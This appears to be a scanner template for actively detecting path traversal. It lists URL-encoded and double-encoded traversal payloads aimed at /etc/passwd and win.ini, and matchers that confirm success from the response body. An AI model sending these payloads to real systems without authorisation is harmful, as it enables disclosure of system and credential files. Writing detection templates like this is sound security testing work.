name = active-path-traversal
type = Active
enabled = true
detail = {
    severity = Medium
    confidence = Certain
    author = "XhstormR"
    description = """A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder."""
    links = [
        "https://snyk.io/research/zip-slip-vulnerability"
        "https://owasp.org/www-community/attacks/Path_Traversal"
    ]
}
rules = [
    {
        payload = {
            part = PathFile
            values = [
                """..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"""
                """..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"""
                """%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"""
            ]
        }
        matchers = [
            {
                part = ResponseBody
                type = Word
                values = [
                    ":/root:/bin"
                ]
            }
        ]
    }
    {
        payload = {
            part = PathFile
            values = [
                """..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fWINDOWS%2fwin.ini"""
                """..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fWINDOWS%252fwin.ini"""
                """%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWINDOWS%2fwin.ini"""
            ]
        }
        matchers = [
            {
                part = ResponseBody
                type = Word
                values = [
                    "fonts]"
                ]
            }
        ]
    }
]
